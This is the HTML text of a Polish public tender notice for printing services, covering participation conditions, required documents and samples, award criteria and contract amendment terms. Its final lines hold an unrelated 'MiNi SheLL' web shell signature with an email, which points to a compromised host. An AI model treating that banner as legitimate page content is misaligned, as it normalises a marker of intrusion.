a)	należycie wykonał co najmniej dwa zamówienia o charakterze i złożoności porównywalnej do przedmiotu zamówienia, tj. każde polegające na usłudze drukowania na kwotę nie mniejszą niż 20.000,00 zł brutto (usługa mogła być realizowana sukcesywnie), wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy  w tym okresie.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia  na podstawie art. 24 ust. 5 pkt. 1 Ustawy, </div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zamawiający żąda następujących dokumentów:
a)	wykazu należycie wykonanych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres działalności jest krótszy  w tym okresie (według wzoru stanowiącego załącznik nr 5 do SIWZ), zawierającego co najmniej dwa zamówienia o charakterze i złożoności porównywalnej do przedmiotu zamówienia, każde polegające na usłudze drukowania na kwotę nie mniejszą niż 20.000,00 zł brutto (usługa mogła być realizowana sukcesywnie), wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usług te zostały wykonane; wraz z dowodami czy usługi zostały wykonane należycie, w postaci:
           a1) referencji bądź innego dokumentu wystawionego przez podmiot, na rzecz którego usługi zostały wykonane , lub
   a2) oświadczenia Wykonawcy jeżeli z uzasadnionych przyczyn o obiektywnym      charakterze Wykonawca nie jest w stanie uzyskać dokumentów, o którym mowa w lit. a1).
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.	Wykonawca wraz z ofertą składa:
1)	aktualne na dzień składania ofert oświadczenia o braku podstaw do wykluczenia zgodnie z art. 22 ust.1 pkt. 1 Ustawy (według wzoru stanowiącego załącznik nr 2 do SIWZ),
2)	aktualne na dzień składania ofert oświadczenia o spełnianiu przez Wykonawcę warunków udział w postępowaniu określonych w Rozdziale 5 ust. 1 pkt. 2 SIWZ (według wzoru stanowiącego załącznik nr 3 do SIWZ).
             Informacje zawarte w oświadczeniach będą stanowić wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.
3)	w celu potwierdzenia spełnienia przez oferowane usługi wymagań określonych przez Zamawiającego, Zamawiający żąda złożenia próbek w postaci: 
a)	plakatu wydrukowanego w trzech egzemplarzach w formacie A2 (o treści projektu stanowiącego załącznik nr 7 do SIWZ) na  papierze - kreda z połyskiem o gramaturze 250 g/m2 , w kolorystyce - 4/4 CMYK,
b)	podkładki z klipsem w formacie A4 (o treści projektu stanowiącego załącznik nr 8 do SIWZ) na tekturze o grubości 2 mm, w kolorystyce  - 4/4 CMYK, z wykończeniem -  laminat błysk obustronnie i metalowy klip do kartek,
4)	dokumenty, nie będące dokumentami potwierdzającymi spełnienie warunków udziału w postępowaniu:
a)	pełnomocnictwo - jeżeli umocowanie do reprezentowania i składania oświadczeń woli w imieniu Wykonawcy nie wynika z innych dokumentów załączonych do oferty - w oryginale albo w postaci uwierzytelnionej notarialnie kopii,
b)	pełnomocnictwo lub inny dokument potwierdzający umocowanie pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa w Rozdziale 7 ust. 1 SIWZ - w oryginale albo w postaci uwierzytelnionej notarialnie kopii,
5)	Wykonawca, który powołuje się na zasoby innych podmiotów:
a)	w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniach, o których mowa w pkt. 1 i 2,
b)	składa pisemne zobowiązania podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - w oryginale albo w postaci uwierzytelnionej notarialnie kopii.
2.	Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 Ustawy, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Ustawy (według wzoru stanowiącego załącznik nr 6 do SIWZ). Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto oferty</td><td>60</td></tr><tr><td>Jakość wydruków</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje, że wprowadzenie zmian do zawartej umowy możliwe będzie w przypadkach określonych w art. 144 Ustawy, w tym w szczególności gdy Zamawiający uzna, że zmiany te są niezbędne celem zapewnienia prawidłowego wykonania umowy przez strony, w tym w następujących przypadkach: 
1)	omyłek pisarskich lub błędów rachunkowych, 
2)	mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami, 
3)	konieczności zmiany sposobu wykonania lub zakresu zamówienia z przyczyn wcześniej nie przewidzianych lub w przypadku zmiany potrzeb Zamawiającego,
4)	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,
5)	zmiany cen brutto w związku ze zmianą obowiązujących stawek podatku od towarów i usług,
6)	zmiany albo rezygnacji z podwykonawcy z tym zastrzeżeniem, iż jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 22a ust. 1 Ustawy, w celu wykazania spełniania warunków udziału w postępowaniu lub kryteriów selekcji, wykonawca jest obowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia,
7)	innych zmian korzystnych dla Zamawiającego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/02/2017, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com